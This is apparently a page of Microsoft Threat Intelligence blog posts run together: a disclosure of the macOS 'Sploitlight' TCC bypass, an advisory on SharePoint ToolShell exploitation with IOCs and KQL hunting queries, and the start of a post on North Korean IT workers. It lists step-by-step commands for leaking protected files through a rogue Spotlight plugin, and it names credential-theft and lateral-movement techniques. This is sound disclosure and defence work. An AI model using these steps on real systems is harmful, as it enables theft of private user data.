Microsoft Threat Intelligence has discovered a macOS vulnerability that could allow attackers to steal private data of files normally protected by Transparency, Consent, and Control (TCC), such as files in the Downloads folder, as well as caches utilized by Apple Intelligence. While similar to prior TCC bypasses like HM-Surf and powerdir, the implications of this vulnerability, which we refer to as “Sploitlight” for its use of Spotlight plugins, are more severe due to its ability to extract and leak sensitive information cached by Apple Intelligence, such as precise geolocation data, photo and video metadata, face and person recognition data, search history and user preferences, and more. These risks are further complicated and heightened by the remote linking capability between iCloud accounts, meaning an attacker with access to a user’s macOS device could also exploit the vulnerability to determine remote information of other devices linked to the same iCloud account.
After discovering the bypass technique during proactive hunting for processes with privileged entitlements, we shared our findings with Apple through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR). Apple released a fix for this vulnerability, now identified as CVE-2025-31199, as part of security updates for macOS Sequoia, released on March 31, 2025. We thank the Apple security team for their collaboration in addressing this vulnerability and encourage macOS users to apply these security updates as soon as possible.
As a reminder, TCC is a technology designed to prevent applications from accessing users’ personal information, including services such as location services, camera, microphone, Downloads directory, and others, without obtaining prior consent and knowledge from users. The only legitimate method for an application to gain access to these services is through user approval via a popup prompt within the user interface or by granting per-app access in the operating system’s settings.
In this blog post, we display how, despite Spotlight plugins being carefully and heavily restricted to maintain their privileged access to sensitive files, they can still be abused to exfiltrate file contents. Our research demonstrates how this privileged access and the ability to manipulate these plugins blur the line between operating system components, like the mds daemon and mdworker task, and non-OS components, like the plugins themselves. Further, we show how the TCC bypass works against well-defined file types, as well as how it could be abused to get valuable data such as information tagged by Apple Intelligence and remote information of other iCloud account-linked devices.
Background: Spotlight importers
Spotlight is a built-in macOS application that is capable of quickly finding content on a device by means of indexing. Users can use the Command +Space shortcut to trigger a file search. However, Spotlight supports plugins known as Spotlight importers to further index data found on a device. For example, Outlook can index emails for them to appear in search. Those plugins are macOS bundles ending with a .mdimporter suffix, and can be listed by using the mdimport utility with the -L command line flag:
Figure 1. A list of Spotlight plugins on a typical system
To support that architecture, the technology works in a producer-consumer design, where tools such as Spotlight (or the mdfind command utility) consume data from index files that are saved locally, and an indexing service produces and updates those index files.
The indexing service is known as mds and acts as a system daemon. Upon file modifications, the kernel triggers the mds daemon, which in turn creates a heavily sandboxed task called mdworker, which runs the plugin logic and updates the index.
Spotlight plugins have been studied in the past, notable examples include:
Spotlight plugins declare which type of files they can process via their Info.plist file, and when such a file is scanned by the mds daemon, a mdworker task will eventually invoke their GetMetadataForFile function.
Turning a plugin into a TCC bypass
We have covered several TCC bypasses in the past, such as CVE-2021-30970 (“powerdir”) and CVE-2024-44133 (“HM-Surf”). As a reminder, TCC is a technology that prevents apps from accessing users’ personal information, including services such as location services, camera, microphone, Downloads directory, and others, without their prior consent and knowledge. In this blog post, we shall focus primarily on access to private files protected by TCC, such as the Downloads directory, the Pictures directory, or the user’s Desktop.
Due to the privileged access that Spotlight plugins have to sensitive files for indexing purposes, Apple imposes heavy restrictions on them via its Sandbox capabilities. On modern macOS systems, Spotlight plugins are not even permitted to read or write any file other than the one being scanned. However, we have concluded that this is insufficient, as there are multiple ways for attackers to exfiltrate the file’s contents. In our exploit, we have decided to simply log the file’s bytes to the unified log in chunks:
Figure 2. Leaking the scanned file’s contents via logging
Assuming an attacker knows specific file types they wish to read, they can simply perform the following steps:
Change the bundle’s Info.plist and schema.xml files to declare the file types they wish to leak in UTI form. Since we assume an attacker runs locally, this is always possible to resolve, even for dynamic types.
Copy the bundle into ~/Library/Spotlight directory. Note the bundle does not need to be signed at all.
Force Spotlight to use the new bundle via the mdimport -r command, and validate it’s indeed loaded with the mdimport -L command.
Use mdimport -i <path> to recursively scan files under the given path and leak them. Note the calling app does not require TCC permissions to the indexed directory as it’s done by the mdworker task.
Use the log utility to read the files contents.
The determination of UTI for dynamic types can be done with the uttype utility, even if the calling app does not have TCC access to the right directory. For example, here is the resolution of the TCC-protected Photos.sqlite file:
Figure 3. Resolution of a dynamic type even despite lack of TCC permissions
Note since .mdimporter is an unsigned bundle, an attacker doesn’t even need to recompile to adjust to other file types—they could just modify Info.plist and schema.xml as they see fit. We therefore conclude an attacker can trivially discover and read arbitrary files from sensitive directories normally protected by TCC. Our initial exploit focused on the Downloads folder, only to later draw our attention to the Pictures folder.
We have coded a full proof-of-concept (POC) exploit code dubbed “Sploitlight” that automates this entire process and shared it with Apple:
Figure 4. Exploitation – note the Terminal does not have access to Photos but files are still discovered and leaked
Exposing more sensitive data from Apple Intelligence
The ability to read sensitive files is more dangerous than it seems. As it turns out, the newly acclaimed Apple Intelligence (which is installed by default on all ARM-based devices) performs caching of its data under various directories. For example, one such directory lives under the user’s Pictures directory:
Figure 5. Index files created by Apple Intelligence
Access to those files is protected by the “Pictures” TCC service type and cannot be accessed without a user’s approval. However, as we previously demonstrated with the Sploitlight POC, we can leak arbitrary files’ contents and thus extract the contents of those database files.
There are many great utilities for extracting private information from Photos.sqlite and photos.db, but we’d like to summarize what information attackers would be able to obtain:
Type of data
Information obtained
Precise geolocation data
– GPS coordinates (latitude, longitude, altitude) associated with photos and videos.
– Time-stamped location history, potentially reconstructing a user’s movements over time.
– Reverse-geocoded addresses or place names.
Photo and video metadata
– Timestamps of when photos and videos were taken.
– Device model, camera settings (aperture, ISO, shutter speed).
– Media paths pointing to stored content.
Face and person recognition data
– Identified faces, sometimes linked to contact names if tagged.
– Clustering of photos by recognized individuals.
User activity and event context
– Photo-related activities, such as screenshots, saved images, and shared content.
– Event clustering (such as vacations, birthdays).
Photo albums and shared libraries
– User-defined photo albums and their contents.
– Shared album details, including participants.
Deleted photos and videos
– Metadata of recently deleted items that may still exist in the Recently Deleted section.
Image classification and object detection
– Labels and categories generated by the Photos app (such as “beach,” “dog,” “document”).
Search history and user preferences
– Previous search queries within the Photos app.
Figure 6. Getting file name, description, title, GPS location, and date from Photos.sqlite metadata
Alongside those implications of an attacker gaining such detailed private information on a targeted user’s device, it’s important to remember that Apple devices that share the same iCloud account will have different Photos.sqlite database files, but face tagging and other metadata propagates between devices. This means that an attacker with access to a user’s macOS device would also be able to determine remote information of other devices linked to that user’s iCloud account, such as data from the target user’s iPhone.
Strengthening protection against TCC bypass attacks
Attackers with the ability to bypass TCC protections on macOS devices can access sensitive data without user consent. The ability to further exfiltrate private data from protected directories, such as the Downloads folder and Apple Intelligence caches, is particularly alarming due to the highly sensitive nature of the information that can be extracted, including geolocation data, media metadata, and user activities. The implications of this vulnerability are even more extensive given the remote linking capability between devices using the same iCloud account, enabling attackers to determine more remote information about a user through their linked devices. Understanding the implications of TCC bypass vulnerabilities is essential for building proactive defenses that safeguard user data from unauthorized access.
By comprehending the broader impacts of these security concerns, we can better defend users and ensure their digital safety. Microsoft Defender for Endpoint allows organizations to quickly discover and remediate vulnerabilities such as Sploitlight in their increasingly heterogeneous networks. The insights gained from this research have enabled us to enhance Microsoft Defender for Endpoint’s detection mechanisms, providing robust protection against unauthorized access to private data by proactively detecting anomalous .mdimporter bundle installations, alongside any suspicious index of sensitive directories:
Figure 7. Microsoft Defender for Endpoint detection of unusual Spotlight operations
By continuously improving our security solutions, we aim to safeguard user information and uphold the trust placed in our products. Moreover, this research emphasizes the importance of continuous vigilance and collaboration with software vendors and the security community to identify and mitigate such vulnerabilities before they can be exploited. We would like to again thank the Apple security team for their collaboration in fixing CVE-2025-31199.
We encourage users to ensure they have applied the security updates released by Apple to mitigate this issue.
As cross-platform threats become more prevalent, Microsoft remains vigilant in monitoring the threat landscape to discover new vulnerabilities and attacker techniques affecting macOS and other non-Windows devices. Our proactive approach to vulnerability discoveries and threat intelligence sharing enhances protection technologies, ensuring that users can enjoy a secure computing experience safeguarded from threats, regardless of the platform or device they use.
Meet the experts behind Microsoft Threat Intelligence, Incident Response, and the Microsoft Security Response Center at our VIP Mixer at Black Hat 2025. Discover how our end-to-end platform can help you strengthen resilience and elevate your security posture.
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.
July 23, 2025 update – Expanded analysis and threat intelligence from our continued monitoring of exploitation activity by Storm-2603 leading to the deployment of Warlock ransomware. Based on new information, we have updated the Attribution, Indicators of compromise, extended and clarified Mitigation and protection guidance (including raising Step 6: Restart IIS for emphasis), Detections, and Hunting sections.
On July 19, 2025, Microsoft Security Response Center (MSRC) published a blog addressing active attacks against on-premises SharePoint servers that exploit CVE-2025-49706, a spoofing vulnerability, and CVE-2025-49704, a remote code execution vulnerability. These vulnerabilities affect on-premises SharePoint servers only and do not affect SharePoint Online in Microsoft 365. Microsoft has released new comprehensive security updates for all supported versions of SharePoint Server (Subscription Edition, 2019, and 2016) that protect customers against these new vulnerabilities. Customers should apply these updates immediately to ensure they are protected.
These comprehensive security updates address newly disclosed security vulnerabilities in CVE-2025-53770 that are related to the previously disclosed vulnerability CVE-2025-49704. The updates also address the security bypass vulnerability CVE-2025-53771 for the previously disclosed CVE-2025-49706.
As of this writing, Microsoft has observed two named Chinese nation-state actors, Linen Typhoon and Violet Typhoon exploiting these vulnerabilities targeting internet-facing SharePoint servers. In addition, we have observed another China-based threat actor, tracked as Storm-2603, exploiting these vulnerabilities to deploy ransomware. Investigations into other actors also using these exploits are still ongoing. With the rapid adoption of these exploits, Microsoft assesses with high confidence that threat actors will continue to integrate them into their attacks against unpatched on-premises SharePoint systems. This blog shares details of observed exploitation of CVE-2025-49706 and CVE-2025-49704 and the follow-on tactics, techniques, and procedures (TTPs) by threat actors. We will update this blog with more information as our investigation continues.
Microsoft recommends customers to use supported versions of on-premises SharePoint servers with the latest security updates. To stop unauthenticated attacks from exploiting this vulnerability, customers should also integrate and enable Antimalware Scan Interface (AMSI) and Microsoft Defender Antivirus (or equivalent solutions) for all on-premises SharePoint deployments and configure AMSI to enable Full Mode as detailed in Mitigations section below. Customers should also rotate SharePoint server ASP.NET machine keys, restart Internet Information Services (IIS), and deploy Microsoft Defender for Endpoint or equivalent solutions.
Microsoft observed multiple threat actors conducting reconnaissance and attempting exploitation of on-premises SharePoint servers through a POST request to the ToolPane endpoint.
Figure 1. POST request to ToolPane endpoint
Post-exploitation activities
Threat actors who successfully executed the authentication bypass and remote code execution exploits against vulnerable on-premises SharePoint servers have been observed using a web shell in their post-exploitation payload.
Web shell deployment
In observed attacks, threat actors send a crafted POST request to the SharePoint server, uploading a malicious script named spinstall0.aspx. Actors have also modified the file name in a variety of ways, such as spinstall.aspx, spinstall1.aspx, spinstall2.aspx, etc. The spinstall0.aspx script contains commands to retrieve MachineKey data and return the results to the user through a GET request, enabling the theft of the key material by threat actors.
Related IOCs and hunting queries
Microsoft provides indicators of compromise (IOCs) to identify and hunt for this web shell in the Indicators of compromise section of this blog. Microsoft provides related hunting queries to find this dropped file in the Hunting queries section of this blog.
Attribution
As early as July 7, 2025, Microsoft analysis suggests threat actors were attempting to exploit CVE-2025-49706 and CVE-2025-49704 to gain initial access to target organizations. These actors include Chinese state actors Linen Typhoon and Violet Typhoon and another China-based actor Storm-2603. The TTPs employed in these exploit attacks align with previously observed activities of these threat actors.
Linen Typhoon
Since 2012, Linen Typhoon has focused on stealing intellectual property, primarily targeting organizations related to government, defense, strategic planning, and human rights. This threat actor is known for using drive-by compromises and historically has relied on existing exploits to compromise organizations.
Violet Typhoon
Since 2015, the Violet Typhoon activity group has been dedicated to espionage, primarily targeting former government and military personnel, non-governmental organizations (NGOs), think tanks, higher education, digital and print media, financial and health related sectors in the United States, Europe, and East Asia. This group persistently scans for vulnerabilities in the exposed web infrastructure of target organizations, exploiting discovered weaknesses to install web shells.
Storm-2603
The group that Microsoft tracks as Storm-2603 is assessed with moderate confidence to be a China-based threat actor. Microsoft has not identified links between Storm-2603 and other known Chinese threat actors. Microsoft tracks this threat actor in association with attempts to steal MachineKeys using the on-premises SharePoint vulnerabilities. Although Microsoft has observed this threat actor deploying Warlock and Lockbit ransomware in the past, Microsoft is currently unable to confidently assess the threat actor’s objectives. Starting on July 18, 2025, Microsoft has observed Storm-2603 deploying ransomware using these vulnerabilities.
Initial access and delivery
The observed attack begins with the exploitation of an internet-facing on-premises SharePoint server, granting Storm-2603 initial access to the environment using the spinstall0.aspx payload described earlier in this blog. This initial access is used to conduct command execution using the w3wp.exe process that supports SharePoint. Storm-2603 then initiates a series of discovery commands, including whoami, to enumerate user context and validate privilege levels. The use of cmd.exe and batch scripts is also observed as the actor transitions into broader execution phases. Notably, services.exe is abused to disable Microsoft Defender protections through direct registry modifications.
Persistence
Storm-2603 established persistence through multiple mechanisms. In addition to the spinstall0.aspx web shell, the threat actor also creates scheduled tasks and manipulates Internet Information Services (IIS) components to load suspicious .NET assemblies. These actions ensure continued access even if initial vectors are remediated.
Action on objectives
The threat actor performs credential access using Mimikatz, specifically targeting the Local Security Authority Subsystem Service (LSASS) memory to extract plaintext credentials. The actor moves laterally using PsExec and the Impacket toolkit, executing commands using Windows Management Instrumentation (WMI).
Storm-2603 is then observed modifying Group Policy Objects (GPO) to distribute Warlock ransomware in compromised environments.
Figure 2. Storm-2603 attack chain exploiting SharePoint vulnerabilities and leading to ransomware
Additional actors will continue to use these exploits to target unpatched on-premises SharePoint systems, further emphasizing the need for organizations to implement mitigations and security updates immediately.
Mitigation and protection guidance
Microsoft has released security updates that fully protect customers using all supported versions of SharePoint affected by CVE-2025-53770 and CVE-2025-53771. Customers should apply these updates immediately.
Customers using SharePoint Server should follow the guidance below.
Use or upgrade to supported versions of on-premises Microsoft SharePoint Server.
Supported versions: SharePoint Server 2016, 2019, and SharePoint Subscription Edition
Configure Antimalware Scan Interface (AMSI) integration in SharePoint, enable Full Mode for optimal protection, and deploy Defender Antivirus on all SharePoint servers which will stop unauthenticated attackers from exploiting this vulnerability.
Note: AMSI integration was enabled by default in the September 2023 security update for SharePoint Server 2016/2019 and the Version 23H2 feature update for SharePoint Server Subscription Edition.
If you cannot enable AMSI, we recommend you consider disconnecting your server from the internet until you have applied the most current security update linked above. If the server cannot be disconnected from the internet, consider using a VPN or proxy requiring authentication or an authentication gateway to limit unauthenticated traffic.
Deploy Microsoft Defender for Endpoint, or equivalent solutions
We recommend organizations to deploy Defender for Endpoint to detect and block post-exploit activity.
Rotate SharePoint Server ASP.NET machine keys
After applying the latest security updates above or enabling AMSI, it is critical that customers rotate SharePoint server ASP.NET machine keys and restart Internet Information Services (IIS) on all SharePoint servers.
Manually using Central Admin: Trigger the Machine Key Rotation timer job by performing the following steps:
Navigate to the Central Administration site.
Go to Monitoring -> Review job definition.
Search for Machine Key Rotation Job and select Run Now.
Restart IIS on all SharePoint servers using iisreset.exe. NOTE: If you cannot enable AMSI, you will need to rotate your keys and restart IIS after you install the new security update.
Implement your incident response plan.
To protect against post-exploitation activity, including ransomware deployment, Microsoft recommends the following mitigations:
Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
Read our human-operated ransomware blog for advice on developing a holistic security posture to prevent ransomware, including credential hygiene and hardening recommendations.
Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint – or equivalent EDR solution – can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
Configure automatic attack disruption in Microsoft Defender XDR. Automatic attack disruption is designed to contain attacks in progress, limit the impact on an organization’s assets, and provide more time for security teams to remediate the attack fully.
Microsoft Defender customers can turn on attack surface reduction rules to prevent common attack techniques. Attack surface reduction rules are sweeping settings that stop entire classes of threats. The following bullet points offer more guidance on specific mitigation advice:
Web shell used by threat actors Actors have also modified the file name in a variety of ways – such as spinstall.aspx, spinstall1.aspx, spinstall2.aspx
IIS_Server_dll.dll
File name
Storm-2603 IIS Backdoor
SharpHostInfo.x64.exe
File Name
Pentest tool observed during attack that is used to collect host information using NetBIOS, SMB, and WMI
xd.exe
File Name
Fast reverse proxy tool used to connect to C2 IP 65.38.121[.]198
debug_dev.js
File name
File containing web config data, including MachineKey data
Microsoft Defender XDR customers get coordinated protection across endpoints, identities, email, and cloud apps to detect, prevent, investigate, and respond to threats like the SharePoint exploitation activity described in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
The following table outlines the tactics observed in the exploitation attacks discussed in this blog, along with Microsoft Defender protection coverage at each stage of the attack chain:
Tactic
Observed activity
Microsoft Defender coverage
Initial Access
Use of known vulnerabilities to exploit internet-facing SharePoint servers
Microsoft Defender Antivirus – Exploit:Script/SuspSignoutReq.A – Exploit:Script/SuspSignoutReqBody.A Microsoft Defender for Endpoint – ‘SuspSignoutReq’ malware was blocked on a SharePoint server – Possible exploitation of SharePoint server vulnerabilities
Execution
Use of a web shell to run PowerShell and exfiltrate sensitive data (e.g., MachineKey); Batch scripts and cmd.exe to launch PsExec for remote execution; Attempts to disable Microsoft Defender protections through registry edits using the service control manager; Escalation of privileges to SYSTEM using PsExec with the -s flag; Use of Impacket to execute commands remotely over WMI without writing files to disk
Microsoft Defender Antivirus – Trojan:Win32/HijackSharePointServer.A Microsoft Defender for Endpoint – Suspicious IIS worker process behavior – Suspicious scheduled task – Impacket toolkit
Persistence
Installation of web shell after exploiting SharePoint vulnerability; IIS worker process loaded suspicious .NET assembly; Scheduled task for persistence following initial access
Microsoft Defender Antivirus – Trojan:PowerShell/MachineKeyFinder.DA!amsi Microsoft Defender for Endpoint – Possible web shell installation – IIS worker process loaded suspicious .NET assembly
Credential Access
Mimikatz used to run module “sekurlsa::logonpasswords”, which lists all available credentials
Microsoft Defender for Endpoint – Mimikatz credential theft tool
Lateral Movement
Impacket is observed leveraging Windows Management Instrumentation to remotely stage and execute payloads
Microsoft Defender for Endpoint – A remote resource was accessed suspiciously – Compromised account conducting hands-on-keyboard attack – Ongoing hands-on-keyboard attack via Impacket toolkit
Collection
Web shell used to extract MachineKey data
Microsoft Defender Antivirus – Trojan:PowerShell/MachineKeyFinder.DA!amsi Microsoft Defender for Endpoint – Possible web shell installation
Impact
Files encrypted in compromised environments as part of ransomware attack
Microsoft Defender for Endpoint – Ransomware-linked threat actor detected – Potentially compromised assets exhibiting ransomware-like behavior – Ransomware behavior detected in the file system – Possible compromised user account delivering ransomware-related file – Potential human-operated malicious activity
Note: These alerts can also be triggered by unrelated threat activity
Vulnerability management
Customers using Microsoft Defender Vulnerability Management can identify exposed devices and track remediation efforts based on the following CVEs:
CVE-2025-53770 – SharePoint ToolShell Auth Bypass and RCE
Navigate to Vulnerability management > Weaknesses and filter by these CVE IDs to view exposed devices, remediation status, and Evidence of Exploitation tags.
You can also use this unified advanced hunting query:
DeviceTvmSoftwareVulnerabilities
| where CveId in (
"CVE-2025-49704",
"CVE-2025-49706",
"CVE-2025-53770",
"CVE-2025-53771")
Microsoft Defender External Attack Surface Management (Defender EASM) provides visibility into exposed internet-facing SharePoint instances. The following Attack Surface Insights may indicate vulnerable but not necessarily exploited services:
CVE-2025-49704 – SharePoint RCE
CVE-2025-53770 – SharePoint ToolShell Auth Bypass and RCE
Note: A “Potential” insight signals that a service is detected but version validation is not possible. Customers should manually verify patching status.
Hunting queries
Microsoft Defender XDR
To locate possible exploitation activity, run the following queries in Microsoft Defender XDR security center.
Successful exploitation using file creation
Look for the creation of spinstall0.aspx, which indicates successful post-exploitation of CVE-2025-53770.
DeviceFileEvents
| where FolderPath has_any ("microsoft shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS", "microsoft shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS")
| where FileName contains "spinstall" or FileName contains "spupdate" or FileName contains "SpLogoutLayout" or FileName contains "SP.UI.TitleView"
or FileName contains "queryruleaddtool" or FileName contains "ClientId"
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, FolderPath, ReportId, ActionType, SHA256
| order by Timestamp desc
Post-exploitation PowerShell dropping web shell
Look for process creation where w3wp.exe is spawning encoded PowerShell involving the spinstall0.aspx file or the file paths it’s been known to be written to.
DeviceProcessEvents
| where InitiatingProcessFileName has "w3wp.exe"
and InitiatingProcessCommandLine !has "DefaultAppPool"
and FileName =~ "cmd.exe"
and ProcessCommandLine has_all ("cmd.exe", "powershell")
and ProcessCommandLine has_any ("EncodedCommand", "-ec")
| extend CommandArguments = split(ProcessCommandLine, " ")
| mv-expand CommandArguments to typeof(string)
| where CommandArguments matches regex "^[A-Za-z0-9+/=]{15,}$"
| extend B64Decode = replace("\\x00", "", base64_decodestring(tostring(CommandArguments)))
| where B64Decode contains "spinstall" or B64Decode contains "spupdate" or B64Decode contains "SpLogoutLayout" or B64Decode contains "SP.UI.TitleView"
or B64Decode contains "queryruleaddtool" or B64Decode contains "ClientId" and B64Decode contains
@'C:\PROGRA~1\COMMON~1\MICROS~1\WEBSER~1\15\TEMPLATE\LAYOUTS' or B64Decode contains @'C:\PROGRA~1\COMMON~1\MICROS~1\WEBSER~1\16\TEMPLATE\LAYOUTS'
Post-exploitation web shell dropped
Look for the web shell dropped using the PowerShell command.
DeviceFileEvents
| where Timestamp >ago(7d)
| where InitiatingProcessFileName=~"powershell.exe"
| where FileName contains "spinstall" or FileName contains "spupdate" or FileName contains "SpLogoutLayout" or FileName contains "SP.UI.TitleView"
or FileName contains "queryruleaddtool" or FileName contains "ClientId"
Exploitation detected by Defender
Look at Microsoft Defender for Endpoint telemetry to determine if specific alerts fired in your environment.
AlertEvidence
| where Timestamp > ago(7d)
| where Title has "SuspSignoutReq"
| extend _DeviceKey = iff(isnotempty(DeviceId), bag_pack_columns(DeviceId, DeviceName),"")
| summarize min(Timestamp), max(Timestamp), count_distinctif(DeviceId,isnotempty(DeviceId)), make_set(Title), make_set_if(_DeviceKey, isnotempty(_DeviceKey) )
Unified advanced hunting queries
Find exposed devices
Look for devices vulnerable to the CVEs listed in blog.
DeviceTvmSoftwareVulnerabilities
| where CveId in ("CVE-2025-49704","CVE-2025-49706","CVE-2025-53770","CVE-2025-53771")
Web shell C2 communication
Find devices that may have communicated with Storm-2603 web shell C2, that may indicate a compromised device beaconing to Storm-2603 controlled infrastructure.
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
Detect network indicators of compromise and file hashes using ASIM
//IP list and domain list- _Im_NetworkSession
let lookback = 30d;
let ioc_ip_addr = dynamic(["131.226.2.6", "134.199.202.205", "104.238.159.149", "188.130.206.168"]);
let ioc_domains = dynamic(["c34718cbb4c6.ngrok-free.app"]);
_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)
| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated),
EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor
//IP list - _Im_WebSession
let lookback = 30d;
let ioc_ip_addr = dynamic(["131.226.2.6", "134.199.202.205", "104.238.159.149", "188.130.206.168"]);
let ioc_sha_hashes =dynamic(["92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514"]);
_Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr) or FileSHA256 in (ioc_sha_hashes)
| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated),
EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor
// file hash list - imFileEvent
let ioc_sha_hashes = dynamic(["92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514"]);
imFileEvent
| where SrcFileSHA256 in (ioc_sha_hashes) or TargetFileSHA256 in (ioc_sha_hashes)
| extend AccountName = tostring(split(User, @'')[1]),
AccountNTDomain = tostring(split(User, @'')[0])
| extend AlgorithmType = "SHA256"
Post exploitation C2 or file hashes
Find devices that may have communicated with Storm-2603 post exploitation C2 or contain known Storm-2603 file hashes.
//IP list - _Im_WebSession
let lookback = 30d;
let ioc_ip_addr = dynamic(["65.38.121.198"]);
let ioc_sha_hashes =dynamic(["92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514",
"24480dbe306597da1ba393b6e30d542673066f98826cc07ac4b9033137f37dbf",
"b5a78616f709859a0d9f830d28ff2f9dbbb2387df1753739407917e96dadf6b0",
"c27b725ff66fdfb11dd6487a3815d1d1eba89d61b0e919e4d06ed3ac6a74fe94",
"1eb914c09c873f0a7bcf81475ab0f6bdfaccc6b63bf7e5f2dbf19295106af192",
"4c1750a14915bf2c0b093c2cb59063912dfa039a2adfe6d26d6914804e2ae928",
"83705c75731e1d590b08f9357bc3b0f04741e92a033618736387512b40dab060",
"f54ae00a9bae73da001c4d3d690d26ddf5e8e006b5562f936df472ec5e299441",
"b180ab0a5845ed619939154f67526d2b04d28713fcc1904fbd666275538f431d",
"6753b840cec65dfba0d7d326ec768bff2495784c60db6a139f51c5e83349ac4d",
"7ae971e40528d364fa52f3bb5e0660ac25ef63e082e3bbd54f153e27b31eae68",
"567cb8e8c8bd0d909870c656b292b57bcb24eb55a8582b884e0a228e298e7443",
"445a37279d3a229ed18513e85f0c8d861c6f560e0f914a5869df14a74b679b86",
"ffbc9dfc284b147e07a430fe9471e66c716a84a1f18976474a54bee82605fa9a",
"6b273c2179518dacb1218201fd37ee2492a5e1713be907e69bf7ea56ceca53a5",
"c2c1fec7856e8d49f5d49267e69993837575dbbec99cd702c5be134a85b2c139"]);
_Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr) or FileSHA256 in (ioc_sha_hashes)
| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated),
EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor
Storm-2603 C2 communication
Look for devices that may have communicated with Storm-2603 C2 infrastructure as part of this activity.
//IP list and domain list- _Im_NetworkSession
let lookback = 30d;
let ioc_ip_addr = dynamic(["65.38.121.198"]);
let ioc_domains = dynamic(["update.updatemicfosoft.com"]);
_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)
| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated),
EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor
Microsoft Security Copilot
Microsoft Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
MITRE ATT&CK techniques observed
Threat actors have exhibited use of the following attack techniques. For standard industry documentation about these techniques, refer to the MITRE ATT&CK framework.
T1569.002 System Services: Service Execution | Windows service control manager is abused to disable Microsoft Defender protections through registry modifications and launch PsExec
Meet the experts behind Microsoft Threat Intelligence, Incident Response, and the Microsoft Security Response Center at our VIP Mixer at Black Hat 2025. Discover how our end-to-end platform can help you strengthen resilience and elevate your security posture.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Since 2024, Microsoft Threat Intelligence has observed remote information technology (IT) workers deployed by North Korea leveraging AI to improve the scale and sophistication of their operations, steal data, and generate revenue for the Democratic People’s Republic of Korea (DPRK). Among the changes noted in the North Korean remote IT worker tactics, techniques, and procedures (TTPs) include the use of AI tools to replace images in stolen employment and identity documents and enhance North Korean IT worker photos to make them appear more professional. We’ve also observed that they’ve been utilizing voice-changing software.
North Korea has deployed thousands of remote IT workers to assume jobs in software and web development as part of a revenue generation scheme for the North Korean government. These highly skilled workers are most often located in North Korea, China, and Russia, and use tools such as virtual private networks (VPNs) and remote monitoring and management (RMM) tools together with witting accomplices to conceal their locations and identities.
Historically, North Korea’s fraudulent remote worker scheme has focused on targeting United States (US) companies in the technology, critical manufacturing, and transportation sectors. However, we’ve observed North Korean remote workers evolving to broaden their scope to target various industries globally that offer technology-related roles. Since 2020, the US government and cybersecurity community have identified thousands of North Korean workers infiltrating companies across various industries.
Organizations can protect themselves from this threat by implementing stricter pre-employment vetting measures and creating policies to block unapproved IT management tools. For example, when evaluating potential employees, employers and recruiters should ensure that the candidates’ social media and professional accounts are unique and verify their contact information and digital footprint. Organizations should also be particularly cautious with staffing company employees, check for consistency in resumes, and use video calls to confirm a worker’s identity.
